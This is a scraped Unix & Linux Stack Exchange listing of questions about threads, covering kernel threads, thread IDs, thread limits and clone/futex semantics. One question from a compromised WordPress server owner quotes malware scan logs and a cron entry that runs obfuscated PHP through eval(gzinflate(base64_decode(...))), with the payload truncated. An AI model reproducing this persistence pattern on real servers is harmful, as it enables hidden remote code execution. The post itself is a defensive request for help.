Unix & Linux Stack Exchange

Q&A for users of Linux, FreeBSD and other Unix-like operating systems

Latest Questions

0 votes

0 answers

49 views

Do linux kernel threads run in process context?

linux-kernel kernel-modules interrupt thread irq

I'm aware of Linux `softirqs` **may** run within specific per-cpu kernel thread context -- `ksoftirqd/[cpu_id]`. `Kernel threads` are similar to user-space threads, however they only execute kernel code in `kernel mode` (they don't have user mode stacks). Suppose that at any given point in time, a `...

                                  I'm aware of Linux softirqs **may** run within specific per-cpu kernel thread context -- ksoftirqd/[cpu_id].

Kernel threads are similar to user-space threads, however they only execute kernel code in kernel mode (they don't have user mode stacks).

Suppose that at any given point in time, a ksoftirqd kernel thread is running a softirq (i.e. deferred work from a Top half interrupt handler). As far as I know, kernel threads share the virtual address range to which kernel code (including loaded kernel modules) is mapped to.

What would happen if the softirq bottom half kernel code attempted to access a virtual address (VA) within the user space VA range ? I'm not sure an error would actually occur, but I believe the result of such an access would be unpredictable though.

Does it make sense ? Thanks.

BTW, I run the following trace-cmd command to dig into some details

    root@eve-ng62-28:~# trace-cmd start -e net:netif_receive_skb_entry
    root@eve-ng62-28:~# trace-cmd show
    # tracer: nop
    #
    # entries-in-buffer/entries-written: 2/2   #P:48
    #
    #                                _-----=> irqs-off/BH-disabled
    #                               / _----=> need-resched
    #                              | / _---=> hardirq/softirq
    #                              || / _--=> preempt-depth
    #                              ||| / _-=> migrate-disable
    #                              |||| /     delay
    #           TASK-PID     CPU#  |||||  TIMESTAMP  FUNCTION
    #              | |         |   |||||     |         |
     qemu-system-x86-2064265  b.... 599782.975041: netif_receive_skb_entry: dev=vunl0_2_0 napi_id=0x0 queue_mapping=1 skbaddr=00000000b36764b3 vlan_tagged=0 vlan_proto=0x0000 vlan_tci=0x0000 protocol=0x0800 ip_summed=0 hash=0x00000000 l4_hash=0 len=84 data_len=0 truesize=768 mac_header_valid=1 mac_header=-14 nr_frags=0 gso_size=0 gso_type=0x0
     qemu-system-x86-2064265  b.... 599783.973971: netif_receive_skb_entry: dev=vunl0_2_0 napi_id=0x0 queue_mapping=1 skbaddr=00000000dd8af289 vlan_tagged=0 vlan_proto=0x0000 vlan_tci=0x0000 protocol=0x0800 ip_summed=0 hash=0x00000000 l4_hash=0 len=84 data_len=0 truesize=768 mac_header_valid=1 mac_header=-14 nr_frags=0 gso_size=0 gso_type=0x0


As you can check, netif_receive_skb_entry  tracepoint within netif_receive_skb() kernel function/routine is triggered. It has the b value for the irqs-off/BH-disabled field. Does it mean netif_receive_skb() is actually running within a BH softirq with Bottom Half(BH) disabled ?
                                

CarloC (385 rep)

Jul 16, 2025, 12:11 PM • Last activity: Jul 16, 2025, 06:19 PM

2 votes

2 answers

4389 views

How to find out on which core a thread is running on?

process cpu proc multithreading thread

Let's say we have a CPU-intensive application called `multi-threaded-application.out` that is running on top of Ubuntu with a PID of 10000. It has 4 threads with tid 10001, 10002, 10003, and 10004. I want to know, at any given time, on which core each of these threads is being scheduled? I tried `/p...

                                  Let's say we have a CPU-intensive application called multi-threaded-application.out that is running on top of Ubuntu with a PID of 10000. It has 4 threads with tid 10001, 10002, 10003, and 10004. I want to know, at any given time, on which core each of these threads is being scheduled?

I tried /proc//tasks//status, but I couldn't find any information regarding the core ID that is responsible for running the given thread.

This question is somehow related to this one .

Any help would be much appreciated.

Michel Gokan Khan (133 rep)

Sep 5, 2020, 05:20 PM • Last activity: Jul 14, 2025, 06:02 PM

0 votes

2 answers

82 views

Troj/PHPShel-CE and PHP/Agent-BJNA trojan

ubuntu apache-httpd php thread wordpress

I'm currently dealing with a real threat: the trojans Troj/PHPShel-CE and PHP/Agent-BJNA showed up on my system. I've decided to move to another provider – the first server IP was already blacklisted, and I want to stop any further damage. As a first step, I disabled apache2 and blocked all incoming...

                                  I'm currently dealing with a real threat: the trojans Troj/PHPShel-CE and PHP/Agent-BJNA showed up on my system. I've decided to move to another provider – the first server IP was already blacklisted, and I want to stop any further damage.

As a first step, I disabled apache2 and blocked all incoming/outgoing ports except SSH (port 22). I'm now backing up only the important data (like .pdf, images, etc. – no .php, .exe, .com or anything executable).

But I'm still confused why Sophos didn’t detect the full extent of the infection. Here's what it found:

    Severity,When,Event,User,"User Groups",Device,"Device Groups","IP Address"
    Low,"2025-05-30T22:51:14+02:00","Scan 'Scan Now' completed",n/a,,mail,,xx.xx.xx.xx
    High,"2025-05-30T22:39:03+02:00","Outbreak detected",n/a,,mail,,xx.xx.xx.xx
    Medium,"2025-05-30T22:39:02+02:00","Malware detected: 'Troj/PHPShel-CE' at '/var/www/clients/client1/web7/web/wp-includes/l10n/class-wp-translation-file-security.php'",n/a,,mail,,xx.xx.xx.xx
    Low,"2025-05-30T22:38:45+02:00","Malware cleaned up: 'PHP/Agent-BJNA' at '/var/www/clients/client1/web3/web/wp-content/plugins/wpforms-lite/vendor_prefixed/apimatic/jsonmapper/tests/namespacetest/model/.1748559585'",n/a,,mail,,xx.xx.xx.xx
    more... about 150 times...

After scanning multiple times, some of the same files were detected again – so clearly something is still active.

I chatted with Claude (AI assistant), and he suggested checking all user crontabs, using this:

    echo "Checking crontabs..."
    for user in $(cut -f1 -d: /etc/passwd); do 
        echo "--- Crontab for $user ---"
        crontab -u "$user" -l 2>/dev/null || echo "No crontab for $user"
    done

At first, nothing suspicious came up – but then I found something under a user called web10:

    root@mail:/usr/local/sbin# crontab -u web10 -l
    * * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("jVJtj5pAEP7**** LOT MORE ****==")));

###### My question:

When we move to a new (managed) hosting provider, is there a risk that some infected files could sneak into the new system during the migration – even if we’re careful and avoid transferring obvious malware like .php and .exe files?

###### My setup:

Ubuntu 24.04.2, apache2, php 8.3/8.4, ispconfig3

Harvey68 (1 rep)

Jun 1, 2025, 09:23 AM • Last activity: Jun 3, 2025, 08:44 AM

3 votes

1 answers

871 views

How do you fetch a large file over http in parallel?

wget http parallelism bandwidth thread

**Question:** Since HTTP supports resuming at an offset, are there any tools (or existing options for commands like wget or curl) that will launch multiple threads to fetch the file in parallel with multiple requests at different file offsets? This could help with performance of each socket is throt...

                                  **Question:** 

Since HTTP supports resuming at an offset, are there any tools (or existing options for commands like wget or curl) that will launch multiple threads to fetch the file in parallel with multiple requests at different file offsets? This could help with performance of each socket is throttled separately.

I could write a program to do this, but I'm wondering if the tooling already exists.

**Background:**

Recently I wanted to download a large iso, **but!** ... Somewhere between the server and my internet provider the transfer rate was limited to 100 kilobit! However, I noticed that the first 5 to 10 seconds had great throughput,  hundreds of megabits. So I wrote a small bash script to restart after a few seconds:

    while ! timeout 8 wget -c http://example.com/bigfile.iso ; do true; done

(I hope it was not my provider . . . But maybe it was. Someone please bring back net neutrality!)

KJ7LNW (525 rep)

Feb 3, 2023, 01:28 AM • Last activity: May 9, 2025, 08:03 PM

1 votes

1 answers

3018 views

What types of threads does Java/JVM use from Linux OS's perspective?

linux java multithreading thread

A developer friend of mine recently asked the question: On a Linux system when a Java application runs which has threads, how do these threads appear to the underlying Linux OS? So what are Java threads?

                                  A developer friend of mine recently asked the question: On a Linux system when a Java application runs which has threads, how do these threads appear to the underlying Linux OS?

So what are Java threads?

slm (378955 rep)

Oct 26, 2019, 04:03 AM • Last activity: May 6, 2025, 04:03 PM

2 votes

1 answers

153 views

What is a parked thread in Linux kernel?

linux-kernel scheduling thread wait

What is a parked thread in the context of Linux kernel? I mean a thread that is in `TASK_PARKED` state? How this state differs from `TASK_INTERRUPTIBLE` and `TASK_UNINTERRUPTIBLE`? From which state a thread can be woken faster? Generally, and in particular case if used for waiting: `kthread_parkme /...

                                  What is a parked thread in the context of Linux kernel? I mean a thread that is in TASK_PARKED state?

How this state differs from TASK_INTERRUPTIBLE and TASK_UNINTERRUPTIBLE?

From which state a thread can be woken faster? Generally, and in particular case if used for waiting: kthread_parkme  / kthread_unpark instead of [s]wait_event_... / [s]wake_up_...]?

I know that waitqueues support multiple waiters, but I am interested only in a single sleeper/waker pair.

Andrey Pro (179 rep)

Apr 19, 2025, 01:34 PM • Last activity: Apr 23, 2025, 11:24 AM

4 votes

2 answers

2787 views

API Monitoring and Hooking

process monitoring malware thread api

I am currently reading the "Malware Analyst's Cookbook and DVD". There is a chapter "Dynamic Analysis" and there are also some recipes about hooking and monitoring API calls of process but it is for Windows. I want to do the same thing like recipe 9-10 explains but for Linux. 9-10 is called "Capturi...

                                  I am currently reading the "Malware Analyst's Cookbook and DVD". There is a chapter "Dynamic Analysis" and there are also some recipes about hooking and monitoring API calls of process but it is for Windows. 

I want to do the same thing like recipe 9-10 explains but for Linux. 9-10 is called "Capturing process, Thread, and Image Load Events". 
In this receipe it is showed "how to implement a driver that alerts you when any events occure on the system while your malware samlpe executes". It uses the API functions of the Windows Driver Kit (WDK) to call a user-defined callback function. It uses the callback functions: 

- Process creation callback function called PsSetCreateProcessNotifyRoutine(...)
- Thread creation callback function called PsSetCreateThreadNotifyRoutine(...)
- Image load callback function called PsSetLoadImageNotifyRoutine(...). 

And when any events occur it will display them as a debug message which can then be viewed in e.g. DebugView.

It seems well documented for Windows and it is easy to find information for this, but I have a bit of a problem in finding information for Linux. 

I've found some general introduction to drivers and a one for hooking, but I still haven't found any that are not so general or at least are a bit more focused on malware analysis.

I would be happy for tips for further readings or recommended tutorials on this topic.

Greeneco (401 rep)

Sep 8, 2014, 07:08 PM • Last activity: Apr 17, 2025, 05:08 PM

1 votes

1 answers

69 views

Hit a strange signal settings of a kernel thread in Linux

linux linux-kernel process signals thread

I am working on an embedded Linux system (kernel-5.10.24), and using `busybox` as `init`. Now I hit a strange problem about `signal` settings of a kernel thread in system. The kernel thread is from a device driver, and by `cat /proc/pid/status`, I found its signal settings are as follows, ``` SigQ:...

I am working on an embedded Linux system (kernel-5.10.24), and using busybox as init. Now I hit a strange problem about signal settings of a kernel thread in system. The kernel thread is from a device driver, and by cat /proc/pid/status, I found its signal settings are as follows,

SigQ:   0/31126
SigPnd: 0000000000000000
ShdPnd: 0000000000004000
SigBlk: 0000000000000000
SigIgn: ffffffffffffbfff
SigCgt: 0000000000004000

Other kernel threads have 0xffffffffffffffff of SigIgn. The kernel thread is started with kthread_run() as other threads do. The setting of SigCgt and ShdPnd make the kernel thread unable to go into waiting status, instead, the kernel thread now is in a busy-loop on down_interruptible. So I am wondering is it correct about the kernel thread's signal settings? Where are the signal settings configured for kernel thread, is it possible for me to customize this settings, if so, how to??

wangt13 (631 rep)

Dec 23, 2024, 11:40 AM • Last activity: Dec 24, 2024, 03:16 AM

12 votes

1 answers

10189 views

Get PID from TID

ps thread pthreads

I run [`iotop`](http://guichaz.free.fr/iotop/) to check on programs that are heavy disk users, in case I need to decrease their priority. Usually this is good enough, but `iotop` only shows thread ID (TID), and sometimes I want to know process ID (PID) so I can find out more about which process is r...

                                  I run [iotop](http://guichaz.free.fr/iotop/)  to check on programs that are heavy disk users, in case I need to decrease their priority. Usually this is good enough, but iotop only shows thread ID (TID), and sometimes I want to know process ID (PID) so I can find out more about which process is responsible.

Unfortunately, while ps can display TID (a.k.a SPID, LWP), it doesn't have a flag to take a list of TIDs the way it does for a list of PIDs with --pid. The best I can do is list TIDs and then grep the output. For example, if the thread id is 792, I can do

    $ ps -eLf | grep ' 792 '

which works reasonably well, but is a little inelegant.

Is there a better way?

Nathaniel M. Beaver (1398 rep)

Mar 15, 2018, 04:35 PM • Last activity: Dec 18, 2024, 06:00 AM

4 votes

3 answers

13490 views

How can I get information about threads of process?

ubuntu process thread

I wanted to get information about the threads of a process. I used the `/proc/stat` command in the terminal but I get a "permission denied" error. How can I resolve this issue?

                                  I wanted to get information about the threads of a process. I used the /proc/stat command in the terminal but I get a "permission denied" error. How can I resolve this issue?

                                

The Capricorn (61 rep)

Jul 11, 2017, 06:11 AM • Last activity: Jul 23, 2024, 08:00 PM

1 votes

1 answers

246 views

Why can't Linux provide lighter/green threads?

thread

I often hear that linux threads are heavy (requiring 8mb stack size) and this is why languages like golang implement their own green threads in userspace (allocating to the heap). This then allows handling say 100k connections instead of 10k connections. As I understand it, one problem with this is...

                                  I often hear that linux threads are heavy (requiring 8mb stack size) and this is why languages like golang implement their own green threads in userspace (allocating to the heap). This then allows handling say 100k connections instead of 10k connections. As I understand it, one problem with this is interop with C, and that this is why Rust moved away from them and went with async/await.

But if green threads are so popular, why can't Linux provide its own extremely light weight threads? In other words, why does every language needs to have its own complex thread scheduler ontop of the OS scheduler, when the OS seems better placed to make these scheduling decisions?

flippanthomework (13 rep)

May 26, 2024, 05:56 PM • Last activity: May 26, 2024, 06:24 PM

271 votes

3 answers

147592 views

Why does `htop` show more process than `ps`

process ps top htop thread

In `ps xf` 26395 pts/78 Ss 0:00 \_ bash 27016 pts/78 Sl+ 0:04 | \_ unicorn_rails master -c config/unicorn.rb 27042 pts/78 Sl+ 0:00 | \_ unicorn_rails worker[0] -c config/unicorn.rb In `htop`, it shows up like: ![htop showing multiple unicorn_rails lines][1] [1]: https://i.sstatic.net/1elU4.png Why d...

                                  In ps xf

    26395 pts/78   Ss     0:00  \_ bash
    27016 pts/78   Sl+    0:04  |   \_ unicorn_rails master -c config/unicorn.rb                                           
    27042 pts/78   Sl+    0:00  |       \_ unicorn_rails worker -c config/unicorn.rb                                        

In htop, it shows up like:

Why does htop show more process than ps?

Cheng (6801 rep)

Mar 31, 2011, 10:48 AM • Last activity: Feb 3, 2024, 04:18 AM

4 votes

2 answers

3352 views

Are there any benefits in setting a HDD's logical sector size to 4Kn?

hard-disk block-device multithreading thread

Modern HDDs all are "[Advanced Format][1]" ones, e.g. by default they report a logical/physical sector size of 512/4096. By default, most Linux formatting tools use a block size of 4096 bytes (at least that's the default on Debian/EXT4). Until today, I thought that this was kind of optimized : Linux...

                                  Modern HDDs all are "Advanced Format " ones, e.g. by default they report a logical/physical sector size of 512/4096.

By default, most Linux formatting tools use a block size of 4096 bytes (at least that's the default on Debian/EXT4).

Until today, I thought that this was kind of optimized : Linux/EXT4 sends chunks of 4K data to the HDD, which can handle them optimally, even though its logical sector size is 512K.

But today I read this quite recent (2021) post . The guy did some HDD benchmarks, in order to check if switching his HDD's logical sector size from 512e to 4Kn would provide better performances. His conclusion :

> Remember: My theory going in was that the filesystem uses 4k blocks, and everything is properly aligned, so there shouldn’t be a meaningful difference.\
\
Does that hold up? Well, no. Not at all. (...) Using 4kb blocks… there’s an awfully big difference here. This is single threaded benchmarking, but there is consistently a huge lead going to the 4k sector drive here on 4kb block transfers.
(...)\
\
**Conclusions: Use 4k Sectors!**\
As far as I’m concerned, the conclusions here are pretty clear. If you’ve got a modern operating system that can handle 4k sectors, and your drives support operating either as 512 byte or 4k sectors, convert your drives to 4k native sectors before doing anything else. Then go on your way and let the OS deal with it.

Basically, his conclusion was that there was quite a performance improvement in switching the HDD's logical sector size to 4Kn, vs the out-of-box 512e :

Now, an important thing to note : that particular benchmark was single threaded. He also did a 4-threaded benchmark, which didn't show any significant differences between 512e and 4Kn.

Thus my questions :

 - His conclusion holds up only if you have single threaded processes that read/write on the drive. Does Linux have such single threaded processes ?
 - And thus, would you recommend to set a HDD's logical sector size to 4Kn ?

ChennyStar (1969 rep)

Nov 13, 2023, 05:16 PM • Last activity: Nov 17, 2023, 02:21 PM

0 votes

1 answers

100 views

why ulimit restriction is affect by other processes?

linux process ulimit thread

I have some processes creating large amount of threads (using python ray module), like 32 (proc) * 120 (thread per proc). Then I found other processes would fail on creating threads while their nTH is actually small (like creating a new `ssh localhost` connection, or using `top` in other shell), far...

                                  I have some processes creating large amount of threads (using python ray module), like 32 (proc) * 120 (thread per proc).

Then I found other processes would fail on creating threads while their nTH is actually small (like creating a new ssh localhost connection, or using top in other shell), far less than the typical restriction 4096 NPROC from ulimit -a.

I wonder if the ulimit is a user-scope restriction or process-scope restriction? If the latter, why would it be affected by other processes?

beantowel (1 rep)

Oct 30, 2023, 08:42 AM • Last activity: Oct 30, 2023, 08:57 AM

2 votes

1 answers

533 views

How can I locate the stacks of child tasks (threads) using /proc/<pid>/maps?

linux proc virtual-memory thread

PURPOSE: I am theorising as to how one would go about creating a pointer scanner in a Linux environment. DISCLAIMER: My findings have been tested on Debian Bookworm (current stable) and a Gentoo system with a custom kernel. No differences have been observed. PROBLEM: Without attaching debuggers to a...

PURPOSE: 
I am theorising as to how one would go about creating a pointer scanner in a Linux environment. 

DISCLAIMER:
My findings have been tested on Debian Bookworm (current stable) and a Gentoo system with a custom kernel. No differences have been observed. 

PROBLEM:Without attaching debuggers to a target process, I want to be able to identify the VMA of the stack of each thread/child task. This should be achievable using the proc pseudo-filesystem
DISCUSSION:

Prior to Linux 4.5, /proc/[parent_tid]/maps would label the parent task's stack region with [STACK] in the pathname field, and label each child task's stack region with [STACK:child_tid].

Following Linux 4.5, only the parent task's stack region maintains its [STACK] label. Child task stack regions now have no label. In the commit message for this change (See link 1), Johannes Weiner states that child task stack VMAs can still be viewed by observing their process maps via /proc/[parent_tid]/task/[child_tid]/maps.

This has proven ineffective to me. The memory region maps are identical across parent and child tasks. /proc/[parent_tid]/maps ≡ /proc/[parent_tid]/task/[child_tid*]/maps. This ultimately means that the [STACK] label is attached to the same region.

/proc/[tid]/stat can be used to find the VMA of the bottom of the stack for a given task. It is the 28th value (see man 5 proc). Once again, /proc/[parent_tid]/stat ≡ /proc/[parent_tid]/task/[child_tid*]/stat. Clearly the child task does not share the start of the stack with every other task in the process.

clone(2), the system call used to create new child tasks, takes a stack pointer as a parameter. The most obvious way to acquire memory for a stack is via an anonymous mmap(2). Anonymous memory maps do not have a label in /proc/[tid]/maps. From observing a few single threaded and multi-threaded processes, there is a direct correlation between the number of anonymous memory mappings and the threads of a program. While such mappings are used for more than thread stacks, I very much expect thread stacks to be allocated this way. Each memory mapping gets its own entry in /proc/[tid]/maps. Surely there is a way to determine which of these act as child task stacks?

*What am I getting wrong here?*

RELATED LINKS:

1. Commit for removing the [STACK:tid] label from /proc/[tid]/maps:
https://lists.ubuntu.com/archives/kernel-team/2016-March/074681.html 

vykt (21 rep)

Oct 15, 2023, 04:12 AM • Last activity: Oct 15, 2023, 06:04 AM

3 votes

1 answers

1196 views

Why does Linux needs both pid_max and threads-max?

linux-kernel process sysctl thread

I understand the difference between `/proc/sys/kernel/pid_max` and `/proc/sys/kernel/threads-max`. There's a good explanation at the answer to [Understanding the differences between pid_max, ulimit -u and thread_max](https://unix.stackexchange.com/a/345052/273579): > `/proc/sys/kernel/pid_max` has n...

                                  I understand the difference between /proc/sys/kernel/pid_max and /proc/sys/kernel/threads-max. There's a good explanation at the answer to 
[Understanding the differences between pid_max, ulimit -u and thread_max](https://unix.stackexchange.com/a/345052/273579) :

> /proc/sys/kernel/pid_max has nothing to do with the maximum number
> of processes that can be run at any given time.  It is, in fact, the
> maximum numerical PROCESS IDENTIFIER than can be assigned by the
> kernel.
> 
> In the Linux kernel, a process and a thread are one and the same. 
> They're handled the same way by the kernel.  They both occupy a slot
> in the task_struct data structure.  A thread, by common terminology,
> is in Linux a process that shares resources with another process (they
> will also share a thread group ID).  A thread in the Linux kernel is
> largely a conceptual construct as far as the scheduler is concerned.
> 
> Now that you understand that the kernel largely does not differentiate
> between a thread and a process, it should make more sense that
> /proc/sys/kernel/threads-max is actually the maximum number of
> elements contained in the data structure task_struct.  Which is the
> data structure that contains the list of processes, or as they can be
> called, tasks.

However, effectively, both limit the maximum number of concurrent threads on a host. This number will be - to my understanding - the minimum of pid_max and threads-max. So why are both needed?

I understand that the default value pid_max is [based on the number of possible CPUs](https://stackoverflow.com/a/39631072/8529284)  of the machine while the default of threads-max is derived from the [number of pages](https://stackoverflow.com/a/21926745/8529284) . But since both have the same effect, couldn't Linux just have one value that would be the minimum of both?
                                

aviro (6925 rep)

Sep 11, 2023, 12:47 PM • Last activity: Sep 11, 2023, 01:00 PM

16 votes

3 answers

18021 views

How to kill an individual thread under a process in linux?

linux kill thread

[![enter image description here][1]][1] [1]: https://i.sstatic.net/6urEq.png These are the individual threads of Packet Receiver process. Is there any way to kill any individual thread? Does Linux provide any specific command which can kill or send stop signal to any particular thread under a proces...

                                  
These are the individual threads of Packet Receiver process. Is there any way to kill any individual thread? Does Linux provide any specific command which can kill or send stop signal to any particular thread under a process?

Md. Kawsaruzzaman (165 rep)

Nov 12, 2017, 05:27 AM • Last activity: Aug 30, 2023, 03:57 PM

62 votes

4 answers

98942 views

Creating threads fails with “Resource temporarily unavailable” with 4.3 kernel

linux docker limit fork thread

I am running a docker server on Arch Linux (kernel 4.3.3-2) with several containers. Since my last reboot, both the docker server and random programs within the containers crash with a message about not being able to create a thread, or (less often) to fork. The specific error message is different d...

                                  I am running a docker server on Arch Linux (kernel 4.3.3-2) with several containers. Since my last reboot, both the docker server and random programs within the containers crash with a message about not being able to create a thread, or (less often) to fork. The specific error message is different depending on the program, but most of them seem to mention the specific error Resource temporarily unavailable. See at the end of this post for some example error messages.

Now there are plenty of people who have had this error message, and plenty of responses to them. What’s really frustrating is that everyone seems to be speculating how the issue could be resolved, but no one seems to point out how to _identify_ which of the many possible causes for the problem is present.

I have collected these 5 possible causes for the error and how to verify that they are not present on my system:

1. There is a system-wide limit on the number of threads configured in /proc/sys/kernel/threads-max ([source](https://stackoverflow.com/a/22570554/242365)) . In my case this is set to 60613.
2. Every thread takes some space in the stack. The stack size limit is configured using ulimit -s ([source](https://stackoverflow.com/a/9211891/242365)) . The limit for my shell used to be 8192, but I have increased it by putting * soft stack 32768 into /etc/security/limits.conf, so it ulimit -s now returns 32768. I have also increased it for the docker process by putting LimitSTACK=33554432 into /etc/systemd/system/docker.service ([source](https://sskaje.me/systemd-ulimit/) , and I verified that the limit applies by looking into /proc//limits and by running ulimit -s inside a docker container.
3. Every thread takes some memory. A virtual memory limit is configured using ulimit -v. On my system it is set to unlimited, and 80% of my 3 GB of memory are free.
4. There is a limit on the number of processes using ulimit -u. Threads count as processes in this case ([source](https://superuser.com/a/568943/23403)) . On my system, the limit is set to 30306, and for the docker daemon and inside docker containers, the limit is 1048576. The number of currently running threads can be found out by running ls -1d /proc/*/task/* | wc -l or by running ps -elfT | wc -l ([source](http://rudametw.github.io/blog/posts/2014.04.10/not-enough-threads.html)) . On my system they are between 700 and 800.
5. There is a limit on the number of open files, which according to some [source](http://dimitrik.free.fr/blog/archives/2010/11/mysql-performance-hitting-error-cant-create-a-new-thread-errno-11-on-a-high-number-of-connections.html)s  is also relevant when creating threads. The limit is configured using ulimit -n. On my system and inside docker, the limit is set to 1048576. The number of open files can be found out using lsof | wc -l ([source](http://www.cyberciti.biz/tips/linux-procfs-file-descriptors.html)) , on my system it is about 30000.

It looks like before the last reboot I was running kernel 4.2.5-1, now I’m running 4.3.3-2. Downgrading to 4.2.5-1 fixes all the problems. Other posts mentioning the problem are [this](https://lkml.org/lkml/2015/11/24/203)  and [this](https://bbs.archlinux.org/viewtopic.php?pid=1593364) . I have opened a [bug report for Arch Linux](https://bugs.archlinux.org/task/47662) .

What has changed in the kernel that could be causing this?

----

Here are some example error messages:

    Crash dump was written to: erl_crash.dump
    Failed to create aux thread
 

    Jan 07 14:37:25 edeltraud docker: runtime/cgo: pthread_create failed: Resource temporarily unavailable
 

    dpkg: unrecoverable fatal error, aborting:
     fork failed: Resource temporarily unavailable
    E: Sub-process /usr/bin/dpkg returned an error code (2)
 

    test -z "/usr/include" || /usr/sbin/mkdir -p "/tmp/lib32-popt/pkg/lib32-popt/usr/include"
    /bin/sh: fork: retry: Resource temporarily unavailable
     /usr/bin/install -c -m 644 popt.h '/tmp/lib32-popt/pkg/lib32-popt/usr/include'
    test -z "/usr/share/man/man3" || /usr/sbin/mkdir -p "/tmp/lib32-popt/pkg/lib32-popt/usr/share/man/man3"
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: Resource temporarily unavailable
    /bin/sh: fork: retry: No child processes
    /bin/sh: fork: Resource temporarily unavailable
    /bin/sh: fork: Resource temporarily unavailable
    make: *** [install-man3] Error 254
 

    Jan 07 11:04:39 edeltraud docker: time="2016-01-07T11:04:39.986684617+01:00" level=error msg="Error running container:  System error: fork/exec /proc/self/exe: resource temporarily unavailable"
 

    [Wed Jan 06 23:20:33.701287 2016] [mpm_event:alert] [pid 217:tid 140325422335744] (11)Resource temporarily unavailable: apr_thread_create: unable to create worker thread
                                

cdauth (1487 rep)

Jan 7, 2016, 03:16 PM • Last activity: Aug 17, 2023, 10:48 AM

1 votes

1 answers

358 views

Does the definition of a thread in Linux depend on a system call?

linux thread

## Clone In the manual page for `clone()`/`clone3()` system call I find: > CLONE_THREAD (since Linux 2.4.0). > > If CLONE_THREAD is set, the child is placed in the same thread group as the calling process. > To make the remainder of the discussion of CLONE_THREAD more readable, the term "thread" is...

                                  ## Clone

In the manual page for clone()/clone3() system call I find:


> CLONE_THREAD (since Linux 2.4.0).
> 
> If  CLONE_THREAD  is  set,  the child is placed in the same thread group as the calling process.
>        To make the remainder of the discussion of CLONE_THREAD more readable, the term "thread" is used
>        to refer to the processes within a thread group.

So, as I understand, from the clone's perspective, a thread is something that was created with the CLONE_THREAD flag set (and, thus, ended up in the same thread group as the caller).

## Futex

But looking at, for instance, the manual page for futex(), I find:


> FUTEX_PRIVATE_FLAG (since Linux 2.6.22)
> 
> This  option  bit  can be employed with all futex operations.  It tells the kernel that the futex
>        is process-private and not shared with another process (i.e., it is being used for synchronization
>        only between threads of the same process).  This allows the kernel to make  some  additional
>        performance optimizations.


This seems to relate with the definition of clone, but not quite. When a thread (as in clone is created (that is, the CLONE_THREAD flag is specified), the created tasks also _have to_ share their VM. However, it is possible to create two tasks which are not threads (as in clone), which would still sharing VM (just specifying CLONE_VM). But, judging by the [FUTEX : new PRIVATE futexes](https://lwn.net/Articles/229668/)  article/patch, the optimization used for _PRIVATE futexes is that the virtual address of a futex word are used rather than the physical ones, so, one could probably use private futexes in tasks created with CLONE_VM... but the man for futex() forbids that.

That is not a critical issue, though: the manual imposes a (seemingly unnecessary) restriction but it doesn't break anything. So, here goes a more thrilling example.

## Close

From the manual for the close() system call:


> Furthermore, consider the following scenario where two threads
> are performing operations on the same file descriptor:
> 
> (1)  One  thread  is  blocked  in  an I/O system call on the
> file descriptor.  For example, it is trying
>      to write(2) to a pipe that is already full, or trying to read(2) from a stream socket which
>      currently has no available data.
> 
> (2)  Another thread closes the file descriptor.
> 
> The behavior in this situation varies across systems. 



Clearly, it is assumed here that the two tasks share a file descriptor table, but being threads (as in clone) is neither necessary nor sufficient to claim they do!

If a task is created with CLONE_THREAD|...|CLONE_FILES, it's all good, but if it's just CLONE_THREAD|... (which is allowed), the two threads (as in clone) do not share file descriptors, and the tasks cloned with ...|CLONE_FILES are _not_ threads but _do_ share file descriptors!

## Question

First of all, is this (at least the close() example) a bug in the manual? Is it because it was written before the clone() system call was designed? Or am I missing something?

In general: when using a particular system call that has the term "thread" used in its manual, how do I tell what's implied?

In particular (assuming I want to write code that will work on future kernel versions): would it be ok to use private futexes in tasks that share VM but are not threads (as in clone)? Would it be ok thread-safe to call close in threads (as in clone) that do _not_ share file descriptor tables, as the common sense suggests?
                                

Kolay.Ne (170 rep)

Jul 22, 2023, 08:57 AM • Last activity: Jul 22, 2023, 08:22 PM

0 votes

2 answers

415 views

How to find PID of all processes related to a given process?

process real-time thread priority

How can I go about finding the PID or other information about a process that is doing the work of another process? I'm talking about ```kworker``` threads, for example, or any other threads/processes that are doing work within the kernel for another process. My dilemma is that I have a real-time sch...

How can I go about finding the PID or other information about a process that is doing the work of another process? I'm talking about

threads, for example, or any other threads/processes that are doing work within the kernel for another process. My dilemma is that I have a real-time scheduled process

(SCHED_FIFO)

running at sched prio 99, with CPU affinity bound to CPU 0, but when I inject CPU stress onto my machine, I notice that my important rt process is not able to preempt the other, non-important processes. I'm thinking this may be because the

that do work for this important process do not inherit the priority that the main process has, even though I specify the -a option in taskset and chrt. My current idea is to manually taskset and chrt the kworker threads so they don't get preempted by other, non-rt processes.

stochasticlover1 (9 rep)

Jul 17, 2023, 05:08 PM • Last activity: Jul 19, 2023, 07:42 AM

Showing page 1 of 20 total questions